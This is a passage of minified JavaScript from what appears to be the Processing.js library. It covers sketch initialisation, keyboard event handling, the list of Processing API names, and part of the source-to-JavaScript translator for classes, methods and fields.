bN(127));return}if(dT.indexOf(d7)<0){dE=d7;return}var d9=new bN(65535);cV.key=d9;cV.keyCode=d7;af[d7]=d9;cV.keyPressed();dE=null;dC();return cQ(d8)}function ds(d8){if(dE===null){return}var d7=dE,d9=cA(d8);bn(d7,d9);return cQ(d8)}function co(d8){var d7=dA(d8),d9=af[d7];if(d9===r){return}cV.key=d9;cV.keyCode=d7;cV.keyReleased();delete af[d7];dC()}if(!cU){if(a6 instanceof D.Sketch){cP=a6}else{if(typeof a6==="function"){cP=new D.Sketch(a6)}else{if(!a6){cP=new D.Sketch(function(){})}else{cP=D.compile(a6)}}}cV.externals.sketch=cP;cK();ac.onfocus=function(){cV.focused=true};ac.onblur=function(){cV.focused=false;if(!cP.options.globalKeyEvents){cw()}};if(cP.options.pauseOnBlur){bM(B,"focus",function(){if(aB){cV.loop()}});bM(B,"blur",function(){if(aB&&aw){cV.noLoop();aB=true}cw()})}var aS=cP.options.globalKeyEvents?B:ac;bM(aS,"keydown",cy);bM(aS,"keypress",ds);bM(aS,"keyup",co);for(var c3 in D.lib){if(D.lib.hasOwnProperty(c3)){if(D.lib[c3].hasOwnProperty("attach")){D.lib[c3].attach(cV)}else{if(D.lib[c3] instanceof Function){D.lib[c3].call(this)}}}}var dy=100;var b5=function(ea){if(!(cP.imageCache.pending||F.preloading.pending(dy))){if(B.opera){var d9,d8,d7=cP.imageCache.operaCache;for(d9 in d7){if(d7.hasOwnProperty(d9)){d8=d7[d9];if(d8!==null){d.body.removeChild(d8)}delete d7[d9]}}}cP.attach(ea,g);cP.onLoad(ea);if(ea.setup){ea.setup();ea.resetMatrix();cP.onSetup()}R();if(ea.draw){if(!aB){ea.redraw()}else{ea.loop()}}}else{B.setTimeout(function(){b5(ea)},dy)}};a(this);b5(cV)}else{cP=new D.Sketch;cK();cV.size=function(d7,d9,d8){if(d8&&d8===2){cK("3D")}else{cK("2D")}cV.size(d7,d9,d8)}}};D.debug=q;D.prototype=g;function s(){var P=["abs","acos","alpha","ambient","ambientLight","append","applyMatrix","arc","arrayCopy","asin","atan","atan2","background","beginCamera","beginDraw","beginShape","bezier","bezierDetail","bezierPoint","bezierTangent","bezierVertex","binary","blend","blendColor","blit_resize","blue","box","breakShape","brightness","camera","ceil","Character","color","colorMode","concat","constrain","copy","cos","createFont","createGraphics","createImage","cursor","curve","curveDetail","curvePoint","curveTangent","curveTightness","curveVertex","day","degrees","directionalLight","disableContextMenu","dist","draw","ellipse","ellipseMode","emissive","enableContextMenu","endCamera","endDraw","endShape","exit","exp","expand","externals","fill","filter","floor","focused","frameCount","frameRate","frustum","get","glyphLook","glyphTable","green","height","hex","hint","hour","hue","image","imageMode","intersect","join","key","keyCode","keyPressed","keyReleased","keyTyped","lerp","lerpColor","lightFalloff","lights","lightSpecular","line","link","loadBytes","loadFont","loadGlyphs","loadImage","loadPixels","loadShape","loadStrings","log","loop","mag","map","match","matchAll","max","millis","min","minute","mix","modelX","modelY","modelZ","modes","month","mouseButton","mouseClicked","mouseDragged","mouseMoved","mouseOut","mouseOver","mousePressed","mouseReleased","mouseScroll","mouseScrolled","mouseX","mouseY","name","nf","nfc","nfp","nfs","noCursor","noFill","noise","noiseDetail","noiseSeed","noLights","noLoop","norm","normal","noSmooth","noStroke","noTint","ortho","param","parseBoolean","parseByte","parseChar","parseFloat","parseInt","peg","perspective","PImage","pixels","PMatrix2D","PMatrix3D","PMatrixStack","pmouseX","pmouseY","point","pointLight","popMatrix","popStyle","pow","print","printCamera","println","printMatrix","printProjection","PShape","PShapeSVG","pushMatrix","pushStyle","quad","radians","random","Random","randomSeed","rect","rectMode","red","redraw","requestImage","resetMatrix","reverse","rotate","rotateX","rotateY","rotateZ","round","saturation","save","saveFrame","saveStrings","scale","screenX","screenY","screenZ","second","set","setup","shape","shapeMode","shared","shininess","shorten","sin","size","smooth","sort","specular","sphere","sphereDetail","splice","split","splitTokens","spotLight","sq","sqrt","status","str","stroke","strokeCap","strokeJoin","strokeWeight","subset","tan","text","textAlign","textAscent","textDescent","textFont","textLeading","textMode","textSize","texture","textureMode","textWidth","tint","toImageData","touchCancel","touchEnd","touchMove","touchStart","translate","triangle","trim","unbinary","unhex","updatePixels","use3DContext","vertex","width","XMLElement","year","__contains","__equals","__equalsIgnoreCase","__frameRate","__hashCode","__int_cast","__instanceof","__keyPressed","__mousePressed","__printStackTrace","__replace","__replaceAll","__replaceFirst","__toCharArray","__split","__codePointAt","__startsWith","__endsWith"];var N={};var O,M;for(O=0,M=P.length;O<M;++O){N[P[O]]=null}for(var Q in D.lib){if(D.lib.hasOwnProperty(Q)){if(D.lib[Q].exports){var L=D.lib[Q].exports;for(O=0,M=L.length;O<M;++O){N[L[O]]=null}}}}return N}function c(ap){var aV=s();function aC(bo){var br=[];var bt=bo.split(/([\{\[\(\)\]\}])/);var bw=bt[0];var bu=[];for(var bq=1;bq<bt.length;bq+=2){var bv=bt[bq];if(bv==="["||bv==="{"||bv==="("){bu.push(bw);bw=bv}else{if(bv==="]"||bv==="}"||bv===")"){var bp=bv==="}"?"A":bv===")"?"B":"C";var bs=br.length;br.push(bw+bv);bw=bu.pop()+'"'+bp+(bs+1)+'"'}}bw+=bt[bq+1]}br.unshift(bw);return br}function ah(bp,bo){return bp.replace(/'(\d+)'/g,function(br,bq){var bs=bo[bq];if(bs.charAt(0)==="/"){return bs}return/^'((?:[^'\\\n])|(?:\\.[0-9A-Fa-f]*))'$/.test(bs)?"(new $p.Character("+bs+"))":bs})}function aN(br){var bq=/^\s*/.exec(br),bo;if(bq[0].length===br.length){bo={left:bq[0],middle:"",right:""}}else{var bp=/\s*$/.exec(br);bo={left:bq[0],middle:br.substring(bq[0].length,bp.index),right:bp[0]}}bo.untrim=function(bs){return this.left+bs+this.right};return bo}function a4(bo){return bo.replace(/^\s+/,"").replace(/\s+$/,"")}function at(bq,br){for(var bp=0,bo=br.length;bp<bo;++bp){bq[br[bp]]=null}return bq}function a8(bp){for(var bo in bp){if(bp.hasOwnProperty(bo)){return false}}return true}function aO(bo){return bo.substring(2,bo.length-1)}var be=ap.replace(/\r\n?|\n\r/g,"\n");var L=[];var a1=be.replace(/("(?:[^"\\\n]|\\.)*")|('(?:[^'\\\n]|\\.)*')|(([\[\(=|&!\^:?]\s*)(\/(?![*\/])(?:[^\/\\\n]|\\.)*\/[gim]*)\b)|(\/\/[^\n]*\n)|(\/\*(?:(?!\*\/)(?:.|\n))*\*\/)/g,function(bw,bp,bt,bu,br,bv,bo,bq){var bs;if(bp||bt){bs=L.length;L.push(bw);return"'"+bs+"'"}if(bu){bs=L.length;L.push(bv);return br+"'"+bs+"'"}return bq!==""?" ":"\n"});var X;var ay=a1;var Y=function(bp,bq,bo,br){if(!!bq||!!br){return bp}X=true;return""};do{X=false;ay=ay.replace(/([<]?)<\s*((?:\?|[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)(?:\s+(?:extends|super)\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)?(?:\s*,\s*(?:\?|[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)(?:\s+(?:extends|super)\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)?)*)\s*>([=]?)/g,Y)}while(X);var bi=aC(ay);var aj;var aH={},a7,ax=0;function ba(bp,bo){var bq=bi.length;bi.push(bp);return'"'+bo+bq+'"'}function a5(){return"class"+ ++ax}function bj(bp,bq,bo){bp.classId=bq;bp.scopeId=bo;aH[bq]=bp}var T,Q,an,aT,bg,aX;var M=/\b((?:(?:public|private|final|protected|static|abstract)\s+)*)(class|interface)\s+([A-Za-z_$][\w$]*\b)(\s+extends\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*,\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*\b)*)?(\s+implements\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*,\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*\b)*)?\s*("A\d+")/g;var a9=/\b((?:(?:public|private|final|protected|static|abstract|synchronized)\s+)*)((?!(?:else|new|return|throw|function|public|private|protected)\b)[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*"C\d+")*)\s*([A-Za-z_$][\w$]*\b)\s*("B\d+")(\s*throws\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*,\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)*)?\s*("A\d+"|;)/g;var aK=/^((?:(?:public|private|final|protected|static)\s+)*)((?!(?:else|new|return|throw)\b)[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*"C\d+")*)\s*([A-Za-z_$][\w$]*\b)\s*(?:"C\d+"\s*)*([=,]|$)/;var bk=/\b((?:(?:public|private|final|protected|static|abstract)\s+)*)((?!(?:new|return|throw)\b)[A-Za-z_$][\w$]*\b)\s*("B\d+")(\s*throws\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*,\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)*)?\s*("A\d+")/g;var U=/^((?:(?:public|private|final|protected|static)\s+)*)((?!(?:new|return|throw)\b)[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*"C\d+")*)\s*/;var ar=/\bfunction(?:\s+([A-Za-z_$][\w$]*))?\s*("B\d+")\s*("A\d+")/g;function ac(bp){var bo=bp;bo=bo.replace(M,function(bq){return ba(bq,"E")});bo=bo.replace(a9,function(bq){return ba(bq,"D")});bo=bo.replace(ar,function(bq){return ba(bq,"H")});return bo}function bb(bq,bp){var bo=bq.replace(bk,function(bv,bs,bt,bw,bu,br){if(bt!==bp){return bv}return ba(bv,"G")});return bo}function aF(bo){this.name=bo}aF.prototype.toString=function(){return this.name};function am(bo){this.params=bo}am.prototype.getNames=function(){var bq=[];for(var bp=0,bo=this.params.length;bp<bo;++bp){bq.push(this.params[bp].name)}return bq};am.prototype.toString=function(){if(this.params.length===0){return"()"}var bo="(";for(var bq=0,bp=this.params.length;bq<bp;++bq){bo+=this.params[bq]+", "}return bo.substring(0,bo.length-2)+")"};function aB(bt){var br=a4(bt.substring(1,bt.length-1));var bo=[];if(br!==""){var bp=br.split(",");for(var bq=0;bq<bp.length;++bq){var bs=/\b([A-Za-z_$][\w$]*\b)(\s*"[ABC][\d]*")*\s*$/.exec(bp[bq]);bo.push(new aF(bs[1]))}}return new am(bo)}function ao(bs){var br=bs;br=br.replace(/\bnew\s+([A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)(?:\s*"C\d+")+\s*("A\d+")/g,function(bu,bt,bv){return bv});br=br.replace(/\bnew\s+([A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)(?:\s*"B\d+")\s*("A\d+")/g,function(bu,bt,bv){return ba(bu,"F")});br=br.replace(ar,function(bt){return ba(bt,"H")});br=br.replace(/\bnew\s+([A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)\s*("C\d+"(?:\s*"C\d+")*)/g,function(by,bx,bv){var bu=bv.replace(/"C(\d+)"/g,function(bA,bz){return bi[bz]}).replace(/\[\s*\]/g,"[null]").replace(/\s*\]\s*\[\s*/g,", ");var bw="{"+bu.substring(1,bu.length-1)+"}";var bt="('"+bx+"', "+ba(bw,"A")+")";return"$p.createJavaArray"+ba(bt,"B")});br=br.replace(/(\.\s*length)\s*"B\d+"/g,"$1");br=br.replace(/#([0-9A-Fa-f]{6})\b/g,function(bt,bu){return"0xFF"+bu});br=br.replace(/"B(\d+)"(\s*(?:[\w$']|"B))/g,function(bw,bu,bv){var bx=bi[bu];if(!/^\(\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*\s*(?:"C\d+"\s*)*\)$/.test(bx)){return bw}if(/^\(\s*int\s*\)$/.test(bx)){return"(int)"+bv}var bt=bx.split(/"C(\d+)"/g);if(bt.length>1){if(!/^\[\s*\]$/.test(bi[bt[1]])){return bw}}return""+bv});br=br.replace(/\(int\)([^,\]\)\}\?\:\*\+\-\/\^\|\%\&\~<\>\=]+)/g,function(bu,bt){var bv=aN(bt);return bv.untrim("__int_cast("+bv.middle+")")});br=br.replace(/\bsuper(\s*"B\d+")/g,"$$superCstr$1").replace(/\bsuper(\s*\.)/g,"$$super$1");br=br.replace(/\b0+((\d*)(?:\.[\d*])?(?:[eE][\-\+]?\d+)?[fF]?)\b/,function(bv,bu,bt){if(bu===bt){return bv}return bt===""?"0"+bu:bu});br=br.replace(/\b(\.?\d+\.?)[fF]\b/g,"$1");br=br.replace(/([^\s])%([^=\s])/g,"$1 % $2");br=br.replace(/\b(frameRate|keyPressed|mousePressed)\b(?!\s*"B)/g,"__$1");br=br.replace(/\b(boolean|byte|char|float|int)\s*"B/g,function(bu,bt){return"parse"+bt.substring(0,1).toUpperCase()+bt.substring(1)+'"B'});br=br.replace(/\bpixels\b\s*(("C(\d+)")|\.length)?(\s*=(?!=)([^,\]\)\}]+))?/g,function(bu,by,bt,bx,bw,bz){if(bt){var bv=bi[bx];if(bw){return"pixels.setPixel"+ba("("+bv.substring(1,bv.length-1)+","+bz+")","B")}return"pixels.getPixel"+ba("("+bv.substring(1,bv.length-1)+")","B")}if(by){return"pixels.getLength"+ba("()","B")}if(bw){return"pixels.set"+ba("("+bz+")","B")}return"pixels.toArray"+ba("()","B")});var bq;function bp(bu,bt,by,bw){var bv=bi[bw];bq=true;var bx=aN(bv.substring(1,bv.length-1));return"__"+by+(bx.middle===""?ba("("+bt.replace(/\.\s*$/,"")+")","B"):ba("("+bt.replace(/\.\s*$/,"")+","+bx.middle+")","B"))}do{bq=false;br=br.replace(/((?:'\d+'|\b[A-Za-z_$][\w$]*\s*(?:"[BC]\d+")*)\s*\.\s*(?:[A-Za-z_$][\w$]*\s*(?:"[BC]\d+"\s*)*\.\s*)*)(replace|replaceAll|replaceFirst|contains|equals|equalsIgnoreCase|hashCode|toCharArray|printStackTrace|split|startsWith|endsWith|codePointAt)\s*"B(\d+)"/g,bp)}while(bq);function bo(bv,bt,bu){bq=true;return"__instanceof"+ba("("+bt+", "+bu+")","B")}do{bq=false;br=br.replace(/((?:'\d+'|\b[A-Za-z_$][\w$]*\s*(?:"[BC]\d+")*)\s*(?:\.\s*[A-Za-z_$][\w$]*\s*(?:"[BC]\d+"\s*)*)*)instanceof\s+([A-Za-z_$][\w$]*\s*(?:\.\s*[A-Za-z_$][\w$]*)*)/g,bo)}while(bq);br=br.replace(/\bthis(\s*"B\d+")/g,"$$constr$1");return br}function aA(bp,bo){this.baseInterfaceName=bp;this.body=bo;bo.owner=this}aA.prototype.toString=function(){return"new ("+this.body+")"};function ag(bq){var bp=(new RegExp(/\bnew\s*([A-Za-z_$][\w$]*\s*(?:\.\s*[A-Za-z_$][\w$]*)*)\s*"B\d+"\s*"A(\d+)"/)).exec(bq);var bt=a7,bs=a5();a7=bs;var bo=bp[1]+"$"+bs;var br=new aA(bo,T(bi[bp[2]],bo,"","implements "+bp[1]));bj(br,bs,bt);a7=bt;return br}function ad(bp,bq,bo){this.name=bp;this.params=bq;this.body=bo}ad.prototype.toString=function(){var bp=aj;var bq=at({"this":null},this.params.getNames());aj=function(br){return bq.hasOwnProperty(br.name)?br.name:bp(br)};var bo="function";if(this.name){bo+=" "+this.name}bo+=this.params+" "+this.body;aj=bp;return bo};function aI(bp){var bo=(new RegExp(/\b([A-Za-z_$][\w$]*)\s*"B(\d+)"\s*"A(\d+)"/)).exec(bp);return new ad(bo[1]!=="function"?bo[1]:null,aB(bi[bo[2]]),an(bi[bo[3]]))}function ab(bo){this.members=bo}ab.prototype.toString=function(){var bq=aj;aj=function(bs){return bs.name==="this"?"this":bq(bs)};var bo="";for(var br=0,bp=this.members.length;br<bp;++br){if(this.members[br].label){bo+=this.members[br].label+": "}bo+=this.members[br].value.toString()+", "}aj=bq;return bo.substring(0,bo.length-2)};function aD(br){var bo=br.split(",");for(var bq=0;bq<bo.length;++bq){var bp=bo[bq].indexOf(":");if(bp<0){bo[bq]={value:aX(bo[bq])}}else{bo[bq]={label:a4(bo[bq].substring(0,bp)),value:aX(a4(bo[bq].substring(bp+1)))}}}return new ab(bo)}function aw(bq){if(bq.charAt(0)==="("||bq.charAt(0)==="["){return bq.charAt(0)+aw(bq.substring(1,bq.length-1))+bq.charAt(bq.length-1)}if(bq.charAt(0)==="{"){if(/^\{\s*(?:[A-Za-z_$][\w$]*|'\d+')\s*:/.test(bq)){return"{"+ba(bq.substring(1,bq.length-1),"I")+"}"}return"["+aw(bq.substring(1,bq.length-1))+"]"}var bp=aN(bq);var bo=ao(bp.middle);bo=bo.replace(/"[ABC](\d+)"/g,function(bs,br){return aw(bi[br])});return bp.untrim(bo)}function P(bo){return bo.replace(/(\.\s*)?((?:\b[A-Za-z_]|\$)[\w$]*)(\s*\.\s*([A-Za-z_$][\w$]*)(\s*\()?)?/g,function(br,bt,bp,bv,bu,bs){if(bt){return br}var bq={name:bp,member:bu,callSign:!!bs};return aj(bq)+(bv===r?"":bv)})}function bn(bp,bo){this.expr=bp;this.transforms=bo}bn.prototype.toString=function(){var bo=this.transforms;var bp=P(this.expr);return bp.replace(/"!(\d+)"/g,function(br,bq){return bo[bq].toString()})};aX=function(bq){var bp=[];var bo=aw(bq);bo=bo.replace(/"H(\d+)"/g,function(bs,br){bp.push(aI(bi[br]));return'"!'+(bp.length-1)+'"'});bo=bo.replace(/"F(\d+)"/g,function(bs,br){bp.push(ag(bi[br]));return'"!'+(bp.length-1)+'"'});bo=bo.replace(/"I(\d+)"/g,function(bs,br){bp.push(aD(bi[br]));return'"!'+(bp.length-1)+'"'});return new bn(bo,bp)};function a2(bo,bq,bp){this.name=bo;this.value=bq;this.isDefault=bp}a2.prototype.toString=function(){return this.name+" = "+this.value};function ai(bs,bp){var bt=bs.indexOf("=");var bo,br,bq;if(bt<0){bo=bs;br=bp;bq=true}else{bo=bs.substring(0,bt);br=aX(bs.substring(bt+1));bq=false}return new a2(a4(bo.replace(/(\s*"C\d+")+/g,"")),br,bq)}function aR(bo){if(bo==="int"||bo==="float"){return"0"}if(bo==="boolean"){return"false"}if(bo==="color"){return"0x00000000"}return"null"}function aG(bp,bo){this.definitions=bp;this.varType=bo}aG.prototype.getNames=function(){var bq=[];for(var bp=0,bo=this.definitions.length;bp<bo;++bp){bq.push(this.definitions[bp].name)}return bq};aG.prototype.toString=function(){return"var "+this.definitions.join(",")};function af(bo){this.expression=bo}af.prototype.toString=function(){return this.expression.toString()};function bl(bs){if(aK.test(bs)){var br=U.exec(bs);var bq=bs.substring(br[0].length).split(",");var bo=aR(br[2]);for(var bp=0;bp<bq.length;++bp){bq[bp]=ai(bq[bp],bo)}return new aG(bq,br[2])}return new af(aX(bs))}function aZ(bo,bq,bp){this.initStatement=bo;this.condition=bq;this.step=bp}aZ.prototype.toString=function(){return"("+this.initStatement+"; "+this.condition+"; "+this.step+")"};function aQ(bp,bo){this.initStatement=bp;this.container=bo}aQ.prototype.toString=function(){var bo=this.initStatement.toString();if(bo.indexOf("=")>=0){bo=bo.substring(0,bo.indexOf("="))}return"("+bo+" in "+this.container+")"};function aW(bp,bo){this.initStatement=bp;this.container=bo}aW.iteratorId=0;aW.prototype.toString=function(){var bs=this.initStatement.toString();var bp="$it"+aW.iteratorId++;var br=bs.replace(/^\s*var\s*/,"").split("=")[0];var bq="var "+bp+" = new $p.ObjectIterator("+this.container+"), "+br+" = void(0)";var bo=bp+".hasNext() && (("+br+" = "+bp+".next()) || true)";return"("+bq+"; "+bo+";)"};function W(bp){var bo;if(/\bin\b/.test(bp)){bo=bp.substring(1,bp.length-1).split(/\bin\b/g);return new aQ(bl(a4(bo[0])),aX(bo[1]))}if(bp.indexOf(":")>=0&&bp.indexOf(";")<0){bo=bp.substring(1,bp.length-1).split(":");return new aW(bl(a4(bo[0])),aX(bo[1]))}bo=bp.substring(1,bp.length-1).split(";");return new aZ(bl(a4(bo[0])),aX(bo[1]),aX(bo[2]))}function a0(bo){bo.sort(function(bq,bp){return bp.weight-bq.weight})}function Z(bq,bo,bp){this.name=bq;this.body=bo;this.isStatic=bp;bo.owner=this}Z.prototype.toString=function(){return""+this.body};function al(bq,bo,bp){this.name=bq;this.body=bo;this.isStatic=bp;bo.owner=this}al.prototype.toString=function(){return""+this.body};function R(bq){var bp=M.exec(bq);M.lastIndex=0;var br=bp[1].indexOf("static")>=0;var bo=bi[aO(bp[6])],bt;var bu=a7,bs=a5();a7=bs;if(bp[2]==="interface"){bt=new Z(bp[3],Q(bo,bp[3],bp[4]),br)}else{bt=new al(bp[3],T(bo,bp[3],bp[4],bp[5]),br)}bj(bt,bs,bu);a7=bu;return bt}function aa(bq,br,bo,bp){this.name=bq;this.params=br;this.body=bo;this.isStatic=bp}aa.prototype.toString=function(){var bq=at({},this.params.getNames());var bp=aj;aj=function(br){return bq.hasOwnProperty(br.name)?br.name:bp(br)};var bo="function "+this.methodId+this.params+" "+this.body+"\n";aj=bp;return bo};function N(br){var bp=a9.exec(br);a9.lastIndex=0;var bq=bp[1].indexOf("static")>=0;var bo=bp[6]!==";"?bi[aO(bp[6])]:"{}";return new aa(bp[3],aB(bi[aO(bp[4])]),an(bo),bq)}function ak(bq,bp,bo){this.definitions=bq;this.fieldType=bp;this.isStatic=bo}ak.prototype.getNames=function(){var bq=[];for(var bp=0,bo=this.definitions.length;bp<bo;++bp){bq.push(this.definitions[bp].name)}return bq};ak.prototype.toString=function(){var bv=aj({name:"[this]"});if(this.isStatic){var bu=this.owner.name;var bs=[];for(var bt=0,br=this.definitions.length;bt<br;++bt){var bq=this.definitions[bt];var bo=bq.name,bw=bu+"."+bo;var bp="if("+bw+" === void(0)) {\n "+bw+" = "+bq.value+"; }\n$p.defineProperty("+bv+", '"+bo+"', { get: function(){return "+bw+";}, set: function(val){"+bw+" = val;} });\n";bs.push(bp)}return bs.join("")}return bv+"."+this.definitions.join("; "+bv+".")};function bd(bt){var bs=U.exec(bt);var bo=bs[1].indexOf("static")>=0;var br=bt.substring(bs[0].length).split(/,\s*/g);var bp=aR(bs[2]);for(var bq=0;bq<br.length;++bq){br[bq]=ai(br[bq],bp)}return new ak(br,bs[2],bo)}function aL(bp,bo){this.params=bp;this.body=bo}aL.prototype.toString=function(){var br=at({},this.params.getNames());var bp=aj;aj=function(bs){return br.hasOwnProperty(bs.name)?bs.name:bp(bs)};var bq="function $constr_"+this.params.params.length+this.params.toString();var bo=this.body.toString();if(!/\$(superCstr|constr)\b/.test(bo)){bo="{\n$superCstr();\n"+bo.substring(1)}aj=bp;return bq+bo+"\n"};function aq(bq){var bo=(new RegExp(/"B(\d+)"\s*"A(\d+)"/)).exec(bq);var bp=aB(bi[bo[1]]);return new aL(bp,an(bi[bo[2]]))}function aM(bq,bt,bs,bo,bu,bv){var br,bp;this.name=bq;this.interfacesNames=bt;this.methodsNames=bs;this.fields=bo;this.innerClasses=bu;this.misc=bv;for(br=0,bp=bo.length;br<bp;++br){bo[br].owner=this}}aM.prototype.getMembers=function(bv,bo,bt){if(this.owner.base){this.owner.base.body.getMembers(bv,bo,bt)}var bs,br,bq,bp;for(bs=0,bq=this.fields.length;bs<bq;++bs){var bx=this.fields[bs].getNames();for(br=0,bp=bx.length;br<bp;++br){bv[bx[br]]=this.fields[bs]}}for(bs=0,bq=this.methodsNames.length;bs<bq;++bs){var bu=this.methodsNames[bs];bo[bu]=true}for(bs=0,bq=this.innerClasses.length;bs<bq;++bs){var bw=this.innerClasses[bs];bt[bw.name]=bw}};aM.prototype.toString=function(){function bp(bF){var bE=0;while(bF){++bE;bF=bF.scope}return bE}var by=bp(this.owner);var bz=this.name;var bv="";var bA="";var bC={},bx={},bw={};this.getMembers(bC,bx,bw);var bu,bs,bt,br;if(this.owner.interfaces){var bo=[],bq;for(bu=0,bs=this.interfacesNames.length;bu<bs;++bu){if(!this.owner.interfaces[bu]){continue}bq=aj({name:this.interfacesNames[bu]});bo.push(bq);bv+="$p.extendInterfaceMembers("+bz+", "+bq+");\n"}bA+=bz+".$interfaces = ["+bo.join(", ")+"];\n"}bA+=bz+".$isInterface = true;\n";bA+=bz+".$methods = ['"+this.methodsNames.join("', '")+"'];\n";a0(this.innerClasses);for(bu=0,bs=this.innerClasses.length;bu<bs;++bu){var bD=this.innerClasses[bu];if(bD.isStatic){bv+=bz+"."+bD.name+" = "+bD+";\n"}}for(bu=0,bs=this.fields.length;bu<bs;++bu){var bB=this.fields[bu];if(bB.isStatic){bv+=bz+"."+bB.definitions.join(";\n"+bz+".")+";\n"}}return"(function() {\nfunction "+bz+"() { throw 'Unable to create the interface'; }\n"+bv+bA+"return "+bz+";\n})()"};Q=function(bu,bp,bz){var bA=bu.substring(1,bu.length-1);bA=ac(bA);bA=bb(bA,bp);var bx=[],br=[];bA=bA.replace(/"([DE])(\d+)"/g,function(bD,bC,bB){if(bC==="D"){bx.push(bB)}else{if(bC==="E"){br.push(bB)}}return""});var bv=bA.split(/;(?:\s*;)*/g);var bs;var bt,bq;if(bz!==r){bs=bz.replace(/^\s*extends\s+(.+?)\s*$/g,"$1").split(/\s*,\s*/g)}for(bt=0,bq=bx.length;bt<bq;++bt){var bo=N(bi[bx[bt]]);bx[bt]=bo.name}for(bt=0,bq=bv.length-1;bt<bq;++bt){var by=aN(bv[bt]);bv[bt]=bd(by.middle)}var bw=bv.pop();for(bt=0,bq=br.length;bt<bq;++bt){br[bt]=R(bi[br[bt]])}return new aM(bp,bs,bx,bv,br,{tail:bw})};function az(bp,bw,bv,bu,bq,bx,by,bs,bo){var bt,br;this.name=bp;this.baseClassName=bw;this.interfacesNames=bv;this.functions=bu;this.methods=bq;this.fields=bx;this.cstrs=by;this.innerClasses=bs;this.misc=bo;for(bt=0,br=bx.length;bt<br;++bt){bx[bt].owner=this}}az.prototype.getMembers=function(bv,bp,bu){if(this.owner.base){this.owner.base.body.getMembers(bv,bp,bu)}var bt,bs,br,bq;for(bt=0,br=this.fields.length;bt<br;++bt){var bx=this.fields[bt].getNames();for(bs=0,bq=bx.length;bs<bq;++bs){bv[bx[bs]]=this.fields[bt]}}for(bt=0,br=this.methods.length;bt<br;++bt){var bo=this.methods[bt];bp[bo.name]=bo}for(bt=0,br=this.innerClasses.length;bt<br;++bt){var bw=this.innerClasses[bt];bu[bw.name]=bw}};az.prototype.toString=function(){function bJ(bR){var bQ=0;while(bR){++bQ;bR=bR.scope}return bQ}var bz=bJ(this.owner);var bC="$this_"+bz;var bq=this.name;var bv="var "+bC+" = this;\n";var bD="";var bx="";var bO={},bP={},bF={};this.getMembers(bO,bP,bF);var bN=aj;aj=function(bR){var bQ=bR.name;if(bQ==="this"){return bR.callSign||!bR.member?bC+".$self":bC}if(bO.hasOwnProperty(bQ)){return bO[bQ].isStatic?bq+"."+bQ:bC+"."+bQ}if(bF.hasOwnProperty(bQ)){return bC+"."+bQ}if(bP.hasOwnProperty(bQ)){return bP[bQ].isStatic?bq+"."+bQ:bC+".$self."+bQ}return bN(bR)};var by;if(this.baseClassName){by=bN({name:this.baseClassName});bv+="var $super = { $upcast: "+bC+" };\n";bv+="function $superCstr(){"+by+".apply($super,arguments);if(!('$self' in $super)) $p.extendClassChain($super)}\n";bx+=bq+".$base = "+by+";\n"}else{bv+="function $superCstr(){$p.extendClassChain("+bC+")}\n"}if(this.owner.base){bD+="$p.extendStaticMembers("+bq+", "+by+");\n"}var bI,bG,bH,bE;if(this.owner.interfaces){var bu=[],bo;for(bI=0,bG=this.interfacesNames.length;bI<bG;++bI){if(!this.owner.interfaces[bI]){continue}bo=bN({name:this.interfacesNames[bI]});bu.push(bo);bD+="$p.extendInterfaceMembers("+bq+", "+bo+");\n"}bx+=bq+".$interfaces = ["+bu.join(", ")+"];\n"}if(this.functions.length>0){bv+=this.functions.join("\n")+"\n"}a0(this.innerClasses);for(bI=0,bG=this.innerClasses.length;bI<bG;++bI){var bB=this.innerClasses[bI];if(bB.isStatic){bD+=bq+"."+bB.name+" = "+bB+";\n";bv+=bC+"."+bB.name+" = "+bq+"."+bB.name+";\n"}else{bv+=bC+"."+bB.name+" = "+bB+";\n"}}for(bI=0,bG=this.fields.length;bI<bG;++bI){var bp=this.fields[bI];if(bp.isStatic){bD+=bq+"."+bp.definitions.join(";\n"+bq+".")+";\n";for(bH=0,bE=bp.definitions.length;bH<bE;++bH){var bs=bp.definitions[bH].name,bw=bq+"."+bs;bv+="$p.defineProperty("+bC+", '"+bs+"', {get: function(){return "+bw+"}, set: function(val){"+bw+" = val}});\n"}}else{bv+=bC+"."+bp.definitions.join(";\n"+bC+".")+";\n"}}var bA={};for(bI=0,bG=this.methods.length;bI<bG;++bI){var br=this.methods[bI];var bL=bA[br.name];var bt=br.name+"$"+br.params.params.length;if(bL){++bL;bt+="_"+bL}else{bL=1}br.methodId=bt;bA[br.name]=bL;if(br.isStatic){bD+=br;bD+="$p.addMethod("+bq+", '"+br.name+"', "+bt+");\n";bv+="$p.addMethod("+bC+", '"+br.name+"', "+bt+");\n"}else{bv+=br;bv+="$p.addMethod("+bC+", '"+br.name+"', 